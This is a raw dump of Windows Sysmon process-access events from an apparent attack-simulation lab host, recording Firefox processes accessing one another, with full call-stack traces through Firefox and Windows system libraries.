Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.222{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla 
Firefox\xul.dll+2f2561 10341000x800000000000000017820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.222{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.222{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla 
Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.909{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla 
Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.909{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:38.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla 
Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla 
Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program 
Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 
Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.519{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program 
Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.519{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla 
Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.519{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:38.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla 